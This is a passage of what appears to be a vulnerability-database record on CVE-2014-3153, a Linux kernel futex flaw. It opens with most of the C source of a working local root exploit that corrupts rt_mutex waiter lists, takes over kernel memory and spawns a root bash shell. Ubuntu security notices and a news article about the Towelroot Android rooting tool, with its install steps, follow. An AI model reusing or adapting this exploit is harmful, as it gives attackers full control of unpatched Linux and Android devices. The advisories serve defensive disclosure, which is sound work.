OFFSET_REAL_PARENT);\n\t\tlen = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\n\t\ttid = *(int *)(task_struct_buf + OFFSET_PID);\n\t}\n\n\tif(tid == parent_tid) {\n\t\tpcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\n\t\tset_cred(pcred);\n\t} else\n\t\tprintf(\"Pid %d not found\\n\", parent_tid);\n\treturn;\n}\n\nstatic int read_voluntary_ctxt_switches(pid_t pid)\n{\n\tchar filename[256];\n\tFILE *fp;\n\tint vcscnt = -1;\n\n\tsprintf(filename, \"/proc/self/task/%d/status\", pid);\n\tfp = fopen(filename, \"rb\");\n\tif (fp) {\n\t\tchar filebuf[4096];\n\t\tchar *pdest;\n\t\tfread(filebuf, 1, sizeof filebuf, fp);\n\t\tpdest = strstr(filebuf, \"voluntary_ctxt_switches\");\n\t\tvcscnt = atoi(pdest + 0x19);\n\t\tfclose(fp);\n\t}\n\treturn vcscnt;\n}\n\nstatic void sync_timeout_task(int sig)\n{\n\tint_sync_time_out = 1;\n}\n\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\n{\n\twhile (*do_request == 0) { }\n\tprintf(\"Press RETURN after one second...\");\n\t*did_request = 1;\n\tgetchar();\n\treturn 0;\n}\n\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\n{\n\tstruct sigaction act;\n\tint vcscnt;\n\tint_sync_time_out = 0;\n\n\tact.sa_handler = sync_timeout_task;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGALRM, &act, NULL);\n\n\talarm(3);\n\twhile (*do_request == 0) {\n\t\tif (int_sync_time_out)\n\t\t\treturn -1;\n\t}\n\t\n\talarm(0);\n\tvcscnt = read_voluntary_ctxt_switches(pid);\n\t*did_request = 1;\n\twhile (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\n \tusleep(10);\n\t}\n\n\treturn 0;\n}\n\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\n{\n\t*do_request = 1;\n\twhile (*did_request == 0) { }\n}\n\nvoid fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\n{\n\tstruct rt_mutex_waiter *pwaiter6, *pwaiter7;\n\tstruct rt_mutex_waiter waiter6, waiter7;\n\tstruct rt_mutex 
mutex;\n\tif(!pmutex) \n\t\treturn;\n\tread_pipe(pmutex, &mutex, sizeof(mutex));\n\tpwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\n\tif(!pwaiter6) \n\t\treturn;\n\tread_pipe(pwaiter6, &waiter6, sizeof(waiter6));\n\tpwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\n\tif(!pwaiter7) \n\t\treturn;\n\tread_pipe(pwaiter7, &waiter7, sizeof(waiter7));\n\t\n\twaiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\n\twaiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\n\tmutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\n\twaiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\n\t\n\twrite_pipe(pmutex, &mutex, sizeof(mutex));\n\twrite_pipe(pwaiter6, &waiter6, sizeof(waiter6));\n\twrite_pipe(pwaiter7, &waiter7, sizeof(waiter7));\n}\n\nstatic void void_handler(int signum)\n{\n\tpthread_exit(0);\n}\n\nstatic void kernel_hack_task(int signum)\n{\n\tstruct rt_mutex *prt_mutex, rt_mutex;\n\tstruct rt_mutex_waiter rt_waiter11;\n\tint tid = syscall(__NR_gettid);\n\tint pid = getpid();\n\n\tset_parent_cred(hack_thread_stack, main_pid);\n\t\n\tread_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\n\t\n\tprt_mutex = rt_waiter11.lock;\n\tread_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\n\t\n\tvoid *ptask_struct = rt_mutex.owner;\n\tptask_struct = (void *)((long)ptask_struct & ~ 0xF);\n\tint len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\n\tint *ppid = (int *)(task_struct_buf + OFFSET_PID);\n\tvoid **pstack = (void **)&task_struct_buf[8];\n\tvoid *owner_sp = *pstack;\n\tset_addr_limit(owner_sp);\n\n\tpthread_mutex_lock(&hacked_lock);\n\tpthread_cond_signal(&hacked);\n\tpthread_mutex_unlock(&hacked_lock);\n}\n\nstatic void *call_futex_lock_pi_with_priority(void *arg)\n{\n\tint prio;\n\tstruct sigaction act;\n\tint ret;\n\t\n\tprio = (long)arg;\n\tlast_tid = 
syscall(__NR_gettid);\n\t\n\tpthread_mutex_lock(&is_thread_desched_lock);\n\tpthread_cond_signal(&is_thread_desched);\n\t\n\tact.sa_handler = void_handler;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\n\t\n\tact.sa_handler = kernel_hack_task;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_HACK_KERNEL, &act, NULL);\n\t\n\tsetpriority(PRIO_PROCESS, 0, prio);\n\t\n\tpthread_mutex_unlock(&is_thread_desched_lock);\n\t\n\tsync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\n\t\n\tret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\n\t\n\treturn NULL;\n}\n\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\n{\n\tpthread_t th4;\n\tpid_t pid;\n\t\n\tdo_dm_tid_read = 0;\n\tdid_dm_tid_read = 0;\n\t\n\tpthread_mutex_lock(&is_thread_desched_lock);\n\tpthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\n\tpthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\n\t\n\tpid = last_tid;\n\t\n\tsync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\n\t\n\tpthread_mutex_unlock(&is_thread_desched_lock);\n\t\n\treturn th4;\n}\n\nstatic int server_for_setup_rt_waiter(void)\n{\n\tint sockfd;\n\tint yes = 1;\n\tstruct sockaddr_in addr = {0};\n\t\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\n\t\n\tsetsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\n\t\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(LOCAL_PORT);\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\tbind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\n\t\n\tlisten(sockfd, 1);\n\tlistenfd = sockfd;\n\t\n\treturn accept(sockfd, NULL, NULL);\n}\n\nstatic int connect_server_socket(void)\n{\n\tint sockfd;\n\tstruct sockaddr_in addr = {0};\n\tint ret;\n\tint sock_buf_size;\n\t\n\tsockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\n\tif (sockfd < 0) {\n\t\tprintf(\"socket 
failed\\n\");\n\t\tusleep(10);\n\t} else {\n\t\taddr.sin_family = AF_INET;\n\t\taddr.sin_port = htons(LOCAL_PORT);\n\t\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n\t}\n\t\n\twhile (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\n\t\tusleep(10);\n\t}\n\t\n\tsock_buf_size = 1;\n\tsetsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\n\t\n\treturn sockfd;\n}\n\nunsigned long iov_base0, iov_basex;\nsize_t iov_len0, iov_lenx;\n\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\n{\n\tint sockfd;\n\tstruct mmsghdr msgvec[1];\n\tstruct iovec msg_iov[8];\n\tunsigned long databuf[0x20];\n\tint i;\n\tint ret;\n\tstruct sigaction act;\n\t\n\tact.sa_handler = void_handler;\n\tsigemptyset(&act.sa_mask);\n\tact.sa_flags = 0;\n\tact.sa_restorer = NULL;\n\tsigaction(SIGNAL_THREAD_EXIT, &act, NULL);\n\t\n\twaiter_thread_tid = syscall(__NR_gettid);\n\tsetpriority(PRIO_PROCESS, 0, 12);\n\t\n\tsockfd = connect_server_socket();\n\tclientfd = sockfd;\n\t\n\tfor (i = 0; i < ARRAY_SIZE(databuf); i++) {\n\tdatabuf[i] = (unsigned long)waiter_plist;\n\t}\n\t\n\tfor (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\n\tmsg_iov[i].iov_base = waiter_plist;\n\tmsg_iov[i].iov_len = (long)waiter_plist;\n\t}\n\tmsg_iov[1].iov_base = (void *)iov_base0;\n\t\n\tmsgvec[0].msg_hdr.msg_name = databuf;\n\tmsgvec[0].msg_hdr.msg_namelen = sizeof databuf;\n\tmsgvec[0].msg_hdr.msg_iov = msg_iov;\n\tmsgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\n\tmsgvec[0].msg_hdr.msg_control = databuf;\n\tmsgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\n\tmsgvec[0].msg_hdr.msg_flags = 0;\n\tmsgvec[0].msg_len = 0;\n\t\n\tsyscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0);\n\t\n\tsync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\n\t\n\tret = 0;\n\t\n\twhile (1) {\n\tret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\n\tif (ret <= 0) {\n\t\tbreak;\n\t} else \n\t\tprintf(\"sendmmsg ret %d\\n\", ret);\n\t}\n\treturn NULL;\n}\n\nstatic void 
plist_set_next(struct list_head *node, struct list_head *head)\n{\n\tnode->next = head;\n\thead->prev = node;\n\tnode->prev = head;\n\thead->next = node;\n}\n\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\n{\n\trt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\n\trt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\n\tplist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\n\tplist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\n}\n\nstatic bool do_exploit(void *waiter_plist)\n{\n\tvoid *magicval, *magicval2;\n\tstruct rt_mutex_waiter *rt_waiters;\n\tpid_t pid;\n\tpid_t pid6, pid7, pid12, pid11;\n\t\n\trt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\n\t\n\tsyscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\n\t\n\twhile (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\n\t\tusleep(10);\n\t}\n\t\n\tpthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\n\tpthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\n\t\n\tswag2 = 0;\n\tdo_socket_tid_read = 0;\n\tdid_socket_tid_read = 0;\n\t\n\tsyscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\n\t\n\tif (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\n\treturn false;\n\t}\n\t\n\tsetup_waiter_params(rt_waiters);\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\n\tprintf(\"Checking whether exploitable..\");\n\tpthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\n\tif (rt_waiters[0].list_entry.prio_list.next == magicval) {\n\t\tprintf(\"failed\\n\");\n\t\treturn false;\n\t}\n\tprintf(\"OK\\nSeaching good magic...\\n\");\n\tmagicval = rt_waiters[0].list_entry.prio_list.next;\n\t\n\tpthread_cancel_immediately(th11);\n\t\n\tpthread_t th11_1, th11_2;\n\twhile(1) {\n\t\tsetup_waiter_params(rt_waiters);\n\t\tth11_1 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\tmagicval = 
rt_waiters[0].list_entry.prio_list.next;\n\t\thack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\n\t\trt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\n\t\t\n\t\tth11_2 = create_thread_do_futex_lock_pi_with_priority(11);\n\t\tmagicval2 = rt_waiters[1].list_entry.node_list.prev;\n\t\t\n\t\tprintf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\n\t\tif(magicval < magicval2) {\n\t\t\tprintf(\"Good magic found\\nHacking...\\n\");\n\t\t\tbreak;\n\t\t} else {\n\t\t\tpthread_cancel_immediately(th11_1);\n\t\t\tpthread_cancel_immediately(th11_2);\n\t\t}\t\t\n\t}\n\tpwaiter11 = NODE_LIST_TO_WAITER(magicval2);\n\tpthread_mutex_lock(&hacked_lock);\n\tpthread_kill(th11_1, SIGNAL_HACK_KERNEL);\n\tpthread_cond_wait(&hacked, &hacked_lock);\n\tpthread_mutex_unlock(&hacked_lock);\n\tclose(listenfd);\n\t\n\tstruct rt_mutex_waiter waiter11;\n\tstruct rt_mutex *pmutex;\n\tint len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\n\tif(len != sizeof(waiter11)) {\n\t\tpmutex = NULL;\n\t} else {\n\t\tpmutex = waiter11.lock;\n\t}\n\tfix_rt_mutex_waiter_list(pmutex);\n\t\n\tpthread_cancel_immediately(th11_1);\n\tpthread_cancel_immediately(th11_2);\n\t\n\tpthread_cancel_immediately(th7);\n\tpthread_cancel_immediately(th6);\n\tclose(clientfd);\n\tpthread_cancel_immediately(thread_client_to_setup_rt_waiter);\n\t\n\texit(0);\n}\n\n#define MMAP_ADDR_BASE\t0x0c000000\n#define MMAP_LEN\t\t0x0c001000\n\nint main(int argc, char *argv[])\n{\n\tunsigned long mapped_address;\n\tvoid *waiter_plist;\n\t\n\tprintf(\"CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\\n\");\n \n\tmain_pid = gettid();\n\tif(fork() == 0) {\n\t\tiov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\n\t\tif (iov_base0 < 0xb0000000) {\n\t\t\tprintf(\"mmap failed?\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\tiov_len0 = 0x10000;\n\t\t\n\t\tiov_basex = 
(unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);\n\t\tif (iov_basex < MMAP_ADDR_BASE) {\n\t\t\tprintf(\"mmap failed?\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\tiov_lenx = MMAP_LEN;\n\t\t\n\t\twaiter_plist = (void *)iov_basex + 0x400;\n\t\tpthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);\n\t\t\n\t\tsockfd = server_for_setup_rt_waiter();\n\t\tif (sockfd < 0) {\n\t\t\tprintf(\"Server failed\\n\");\n\t\t\treturn 1;\n\t\t}\n\t\t\n\t\tif (!do_exploit(waiter_plist)) {\n\t\t\treturn 1;\n\t\t}\n\t\treturn 0;\n\t}\n\n\twhile(getuid())\n\t\tusleep(100);\n\texecl(\"/bin/bash\", \"bin/bash\", NULL);\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:18", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges.", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2237-1", "href": "https://ubuntu.com/security/notices/USN-2237-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). 
(CVE-2013-4483)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2238-1", "href": "https://ubuntu.com/security/notices/USN-2238-1", "title": "Linux kernel (Raring HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest \nOS users could exploit this flaw to cause a denial of service (host OS \ncrash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2235-1", "href": "https://ubuntu.com/security/notices/USN-2235-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest \nOS users could exploit this flaw to cause a denial of service (host OS \ncrash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. 
An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2236-1", "href": "https://ubuntu.com/security/notices/USN-2236-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-2568", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2240-1", "href": "https://ubuntu.com/security/notices/USN-2240-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:27:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-0155", "CVE-2014-2568", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). 
A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2241-1", "href": "https://ubuntu.com/security/notices/USN-2241-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-0155", "CVE-2014-2568", "CVE-2014-7283", "CVE-2014-3153"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel virtual machine's (kvm) \nvalidation of interrupt requests (irq). A guest OS user could exploit this \nflaw to cause a denial of service (host OS crash). (CVE-2014-0155)\n\nAn information leak was discovered in the netfilter subsystem of the Linux \nkernel. An attacker could exploit this flaw to obtain sensitive information \nfrom kernel memory. (CVE-2014-2568)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-3122)\n\nHannes Frederic Sowa reported a hash collision ordering problem in the xfs \nfilesystem in the Linux kernel. 
A local user could exploit this flaw to \ncause filesystem corruption and a denial of service (oops or panic). \n(CVE-2014-7283)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2239-1", "href": "https://ubuntu.com/security/notices/USN-2239-1", "title": "Linux kernel (Saucy HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:28:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2013-4387", "CVE-2013-4483", "CVE-2014-1438", "CVE-2013-4470"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nDmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP \nFragmentation Offload (UFO) processing. A remote attacker could leverage \nthis flaw to cause a denial of service (system crash). (CVE-2013-4387)\n\nHannes Frederic Sowa discovered a flaw in the Linux kernel's UDP \nFragmentation Offload (UFO). An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2013-4470)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). (CVE-2013-4483)\n\nhalfdog reported an error in the AMD K7 and K8 platform support in the \nLinux kernel. An unprivileged local user could exploit this flaw on AMD \nbased systems to cause a denial of service (task kill) or possibly gain \nprivileges via a crafted application. (CVE-2014-1438)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). 
(CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2234-1", "href": "https://ubuntu.com/security/notices/USN-2234-1", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:23:13", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2013-4387", "CVE-2013-4483", "CVE-2014-1438", "CVE-2013-4470"], "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nDmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP \nFragmentation Offload (UFO) processing. A remote attacker could leverage \nthis flaw to cause a denial of service (system crash). (CVE-2013-4387)\n\nHannes Frederic Sowa discovered a flaw in the Linux kernel's UDP \nFragmentation Offload (UFO). An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or possibly gain \nadministrative privileges. (CVE-2013-4470)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An \nunprivileged local user could exploit this flaw to cause a denial of \nservice (OOM system crash). (CVE-2013-4483)\n\nhalfdog reported an error in the AMD K7 and K8 platform support in the \nLinux kernel. An unprivileged local user could exploit this flaw on AMD \nbased systems to cause a denial of service (task kill) or possibly gain \nprivileges via a crafted application. (CVE-2014-1438)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory management \nsubsystem. An unprivileged local user could exploit this flaw to cause a \ndenial of service (system crash). 
(CVE-2014-3122)", "edition": 5, "modified": "2014-06-05T00:00:00", "published": "2014-06-05T00:00:00", "id": "USN-2233-1", "href": "https://ubuntu.com/security/notices/USN-2233-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:14", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "[](<https://1.bp.blogspot.com/-tE3aUIbjEts/U6Feq5kqyMI/AAAAAAAAcGU/KoIG0HblHzU/s1600/one-click-android-rooting-software-app.jpg>)\n\nWaiting for the root access for your AT&T or Verizon Android phone? Then there is really a Great News for you!\n\n \n\n\n**Geohot** (aka George Hotz) - a famed cracker who was responsible for hacking the PlayStation 3 and subsequently being sued by Sony - has built and released a root tool called **Towelroot** on Sunday night that will let most Android smartphones users to root their [Android](<https://thehackernews.com/search/label/Android>) device with one click only, as long as it has an unpatched version of the Linux kernel.\n\n \n**EXPLOITS LINUX KERNEL VULNERABILITY **\n\nTowelroot application exploits the same vulnerability (CVE-2014-3153) which was recently disclosed by the hacker Pinkie Pie in the [Linux kernel version 3.14.5](<https://thehackernews.com/2014/06/linux-kernel-vulnerable-to-privilege_7.html>) and most versions of other Android devices, which could be leveraged by hackers to potentially acquire root access on affected devices.\n\n \n\n\nHaving [root access](<https://thehackernews.com/search/label/Rooting%20android>) of your device simply means you make System-level changes to your device such as accessing and modifying any file or program using any mode (single- or multi-user). It is just like operating an administrator account on a computer.\n\n \n**SUPPORTED DEVICES**\n\nTowelroot supports handful of devices so far including some particularly tough phones. 
here\u2019s the list:\n\n * AT&T Galaxy S5\n * Verizon Galaxy S5\n * Galaxy S4 Active\n * Nexus 5\n * AT&T Galaxy Note 3\n * Verizon Galaxy Note 3\n * Also some users have even reported its success with the all time favorite company of GeoHot, Sony Xperia SP C5303.\n\nGeohot became famous for being the first person to carrier unlock the original iPhone in 2007 and later for creating the limera1n jailbreak tool for future versions of the iPhone. He gained fame after subsequently hacking the software of the PlayStation 3 console, thereby opening up the ability to add homebrew and play pirated games, for which he was taken to court by Sony.\n\n \n**HOW TO ROOT ANDROID DEVICE**\n\n**Step 1:** Download Android Rooting application from [towelroot.com](<https://towelroot.com/>) and install it. \n \n**Step 2:** While Installation you might receive warning message saying that Towelroot \"_contains code that attempts to bypass Android's security_\". Just hit Install anyway after selecting the checkbox: \"_I understand and still want to install it_\". \n \n**Step 3:** Once the Towelroot installation completes, launch the application and click the button reading \"_make it ra1n_\" and it will force your device to reboot. \n \n**Step 4: **After the device reboots to home screen your phone will be rooted with its bootloader unlocked. Cheers! 
\n \n\n\nBesides serving the Android users who were itching for a rooting technique so they could customize their devices, patch apps and install third-party ROMs, the new tool also lets cybercriminals gain administrative access to a victim\u2019s phone: the unpatched kernel bug it relies on can equally be triggered by a malicious app on the device, not only by Towelroot.\n\n \n\n\nWith that administrative access, a criminal could run malicious code, retrieve files, bypass third-party or security applications (including containers such as Samsung\u2019s Knox secure sub-operating system), and place backdoors on users\u2019 devices for future access.\n\n \n**$18000 BOUNTY GOES TO GEOHOT OR PINKIE PIE?**\n\nUntil now, the developer editions of the Samsung Galaxy S5 for Verizon and AT&T had not received root, which is why XDA members started a [Crowd funded Bounty program](<https://thehackernews.com/2014/05/developers-raise-bounty-of-17600-for.html>), now valued at over $18,000, for achieving root on Verizon and AT&T Samsung Galaxy S5 devices.\n\n \n\n\nSo the question now is: who will collect the bounty raised by the XDA developers? 
